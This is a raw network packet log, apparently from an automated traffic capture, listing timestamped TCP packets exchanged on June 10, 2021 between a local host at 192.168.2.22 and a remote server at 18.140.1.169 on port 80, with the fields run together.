                                  Jun 10, 2021 15:24:51.884586096 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884598970 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884603024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884613991 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884619951 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884629965 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884637117 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884654045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884655952 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884670973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884670973 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884684086 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884701014 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885637999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885654926 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885672092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885687113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885703087 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885704041 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885720015 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885724068 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885729074 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885732889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885755062 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885756969 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885772943 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885788918 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885795116 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885806084 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885812998 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885828972 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885833025 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885840893 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885847092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885860920 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885864019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885873079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885881901 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885898113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885900021 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885909081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885915041 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885929108 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885931969 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885941982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885965109 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885972023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885984898 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886001110 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886008978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886017084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886018038 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886032104 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886035919 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886055946 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886055946 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886069059 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886075020 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886091948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886096001 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886109114 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886121988 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886130095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886135101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886153936 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886153936 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886158943 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886168957 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886172056 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886182070 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886188030 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886208057 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886212111 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886220932 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886225939 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886241913 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886245966 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886259079 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886262894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886274099 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886276007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886290073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886300087 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886303902 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886323929 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886339903 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886347055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886354923 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886367083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886378050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886384010 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886394978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886399984 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886414051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886416912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886434078 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886435032 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886450052 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886450052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886465073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886467934 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886482000 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886485100 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886496067 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886504889 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886508942 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886523008 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886538029 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886542082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886554956 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886554956 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886569023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886573076 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886585951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886589050 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886600018 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886605978 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886620998 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886621952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886635065 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886641979 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886650085 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886660099 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886676073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886676073 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886689901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886694908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886712074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886713982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886728048 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886730909 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886744022 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886746883 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886759996 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886759996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886775017 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886780024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886791945 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886797905 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886806965 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886814117 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886830091 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886831999 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886846066 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886846066 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886862040 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886873960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.917716980 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061608076 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061635971 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061655045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061671019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061690092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061707973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061723948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061741114 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061753988 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061752081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061774015 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061786890 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061790943 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061794043 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061795950 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061810970 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061816931 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061830044 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061835051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061847925 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061851978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061863899 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061872959 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061882973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061891079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061901093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061908960 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061922073 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061923981 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061940908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061944962 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061958075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061963081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061975956 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061990023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.061995983 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.061995983 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062007904 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062021017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062032938 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062035084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062046051 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062053919 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062063932 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062079906 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062082052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062093019 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062100887 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062109947 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062122107 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062124014 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062140942 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062148094 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062158108 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062166929 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062175035 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062184095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062192917 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062201977 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062211037 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062221050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062227964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062237978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062247038 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062262058 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062268019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062273026 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062287092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062295914 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062304974 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062314987 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062323093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062330961 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062340975 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062349081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062357903 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062366962 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062376022 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062386036 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062393904 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062406063 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062414885 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062426090 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062434912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062443972 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062453032 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062463045 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062473059 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062483072 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062491894 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062500954 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062510014 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062521935 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062530994 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062539101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062549114 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062553883 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062556028 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062563896 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062573910 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062582970 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062593937 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062606096 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062618017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062628984 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062634945 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062634945 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062642097 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062653065 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062658072 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062673092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062674999 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062693119 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062695026 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062709093 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062719107 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062726021 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.062735081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062752008 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.062767982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071530104 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071557045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071568966 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071585894 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071600914 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071616888 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071631908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071650028 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071661949 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071660042 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071679115 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071693897 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071697950 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071698904 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071702957 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071716070 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071724892 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071733952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071743011 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071753025 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071760893 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071773052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071777105 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071793079 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071796894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071814060 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071836948 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071836948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071857929 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071865082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071875095 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071888924 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071891069 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071907997 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071911097 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071927071 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071934938 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071944952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071960926 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071964025 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071978092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.071989059 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.071995020 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072010040 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072010994 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072026968 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072032928 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072043896 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072053909 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072065115 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072076082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072082996 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072098017 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072098970 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072114944 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072124004 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072134018 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072139978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072153091 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072158098 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072170973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072179079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072192907 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072201967 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072217941 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072230101 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072236061 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072252035 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072253942 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072268009 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072276115 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072283983 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072299004 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072300911 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072316885 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:52.072324991 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:52.072334051 CEST804916518.140.1.169192.168.2.22
